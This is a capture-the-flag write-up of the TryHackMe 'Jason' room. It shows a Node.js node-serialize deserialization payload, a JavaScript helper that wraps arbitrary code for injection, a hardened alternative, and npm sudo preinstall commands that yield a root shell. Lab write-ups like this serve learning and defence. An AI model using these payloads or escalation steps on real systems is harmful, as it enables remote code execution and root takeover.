“The only true wisdom is in knowing you know nothing.” - Socrates

Jason – Easy

In this writeup, we will cover a great machine by ‘elbee’ on TryHackMe.
Room: https://tryhackme.com/room/jason

Summary

  • Enumeration: Port 22 and 80
  • NodeJS application running on port 80
  • User input processed and reflected in server response.
  • Identified a Node.js deserialization vulnerability (the _$$ND_FUNC$$_ function marker used by node-serialize)
  • Generate reverse shell payload using nodejsshell.py
  • Inject the payload in the email parameter
  • Send a GET request to “/” with the cookie received.
  • Shell spawned as the user dylan
  • Check which commands dylan can run with sudo: sudo -l
  • Leverage npm with sudo to execute /bin/sh as root.
  • All done 😀

Enumeration

  • The Nmap results showed that ports 22 and 80 were open.
  • Opening the application running on port 80, we see the landing page and notice that it says “Built with nodejs”.
  • Inspecting the source code of this page, we find JS code which sends a POST request to the current page (window.location.href) with the email input from the user as the email parameter.
  • When we submit an email address using the form, we notice that a session cookie is set in the HTTP response.
  • We decode the cookie value and find that it reflects the input provided by us in the request, i.e. the server serializes our input into the cookie.
  • We then send a GET request to the “/” endpoint with the cookie and find that the value is reflected in the HTTP response, i.e. the server deserializes the cookie on every request.
  • Since our value was reflected in the HTTP response, we tried to send a serialized function as the email parameter. The _$$ND_FUNC$$_ prefix marks a serialized function and the trailing () makes it an IIFE, so it executes during deserialization: _$$ND_FUNC$$_function (){ return 'deser_test'; }()

Exploitation

  • We found that our function was executed: the string deser_test appeared in the HTTP response in place of the email value.
  • Then we tried to get a reverse shell using this vulnerability.
  • Firstly, we generated our shell code using python nodejsshell.py {listeningip} {port}
  • Then, we prepended _$$ND_FUNC$$_function (){ to the payload and appended }() after it (the same marker and IIFE form as the test payload), submitted it as the email parameter, and sent a GET request to “/” with the cookie we received.
  • We got a shell on the host as the user dylan.
  • Looking inside the home directory of dylan, we found user.txt.
  • By running sudo -l, we found that the user dylan can run /usr/bin/npm with sudo.
  • Therefore, we leverage that to escalate our privileges to root.
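To make the deserialization step above concrete, here is an added example (not code from the original writeup or from the Jason room) that models how a node-serialize-style unserialize() turns the _$$ND_FUNC$$_ marker into code execution, runs the deser_test payload from the writeup through it, and shows a hardened replacement that refuses to evaluate anything. It is a simplified reimplementation for illustration, not the library itself; the cookie layout (a base64-encoded JSON object with an email field) and the wrapPayload() helper that reproduces the nodejsshell.py-style String.fromCharCode encoding are assumptions.

```javascript
// Added example: minimal model of the vulnerable pattern behind the Jason room.
// Not the node-serialize library and not the room's server code.

const FUNCFLAG = '_$$ND_FUNC$$_';

// Vulnerable: any string value that starts with FUNCFLAG is passed to eval().
// Because the payload ends with "()" it is an IIFE, so the function body runs
// during unserialize(), before the application touches the result at all.
function vulnerableUnserialize(serialized) {
  const obj = JSON.parse(serialized);
  for (const key of Object.keys(obj)) {
    const value = obj[key];
    if (typeof value === 'string' && value.startsWith(FUNCFLAG)) {
      // eslint-disable-next-line no-eval
      obj[key] = eval('(' + value.slice(FUNCFLAG.length) + ')');
    }
  }
  return obj;
}

// Hardened: same cookie format, but string values are never evaluated.
// A value carrying the function marker is treated as hostile and rejected.
function safeUnserialize(serialized) {
  const obj = JSON.parse(serialized);
  for (const [key, value] of Object.entries(obj)) {
    if (typeof value === 'string' && value.includes(FUNCFLAG)) {
      throw new Error(`rejected serialized function in field "${key}"`);
    }
  }
  return obj;
}

// Assumed cookie layout: the submitted email stored in a session object,
// JSON-serialized and base64-encoded (the writeup decodes the cookie and
// sees the input reflected; the exact field name is an assumption).
function buildSessionCookie(email) {
  return Buffer.from(JSON.stringify({ email })).toString('base64');
}

function decodeSessionCookie(cookie) {
  return Buffer.from(cookie, 'base64').toString('utf8');
}

// Wrap arbitrary JS the way the writeup wraps the nodejsshell.py output:
// charcode-encode the code (avoids quoting problems in the email field),
// then add the _$$ND_FUNC$$_function (){ ... }() marker and IIFE around it.
function wrapPayload(jsCode) {
  const codes = Array.from(jsCode, (c) => c.charCodeAt(0)).join(',');
  return `${FUNCFLAG}function (){ eval(String.fromCharCode(${codes})) }()`;
}

// The test payload from the writeup.
const TEST_PAYLOAD = "_$$ND_FUNC$$_function (){ return 'deser_test'; }()";

// Send the payload through the modelled server, both vulnerable and hardened.
function demo(payload) {
  const cookie = buildSessionCookie(payload);
  const vulnerable = vulnerableUnserialize(decodeSessionCookie(cookie)).email;
  let safe;
  try {
    safeUnserialize(decodeSessionCookie(cookie));
    safe = 'accepted';
  } catch (e) {
    safe = e.message;
  }
  return { vulnerable, safe };
}

console.log(demo(TEST_PAYLOAD));
// vulnerable: 'deser_test' (function body ran), safe: 'rejected serialized function in field "email"'
```

The point of the hardened variant is that the fix is not a better blacklist: the cookie should never be able to carry executable code at all, so plain JSON.parse with a rejection of the marker (or a signed session cookie whose contents the client cannot alter) removes the primitive the exploit depends on.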

Privilege Escalation

Commands used for the above. npm runs a package's lifecycle scripts (such as preinstall) during install, so a package.json whose preinstall script is /bin/sh hands us a shell with npm's privileges. -C points npm at the directory holding that package.json, and --unsafe-perm stops npm from dropping root privileges before it runs the script, which is what makes the resulting shell root:

  • mkdir /home/dylan/privesc
  • cd /home/dylan
  • echo '{"scripts": {"preinstall": "/bin/sh"}}' > privesc/package.json
  • sudo /usr/bin/npm -C privesc --unsafe-perm i

All done!

Hope you enjoyed reading this writeup.
Happy Hunting! 😀
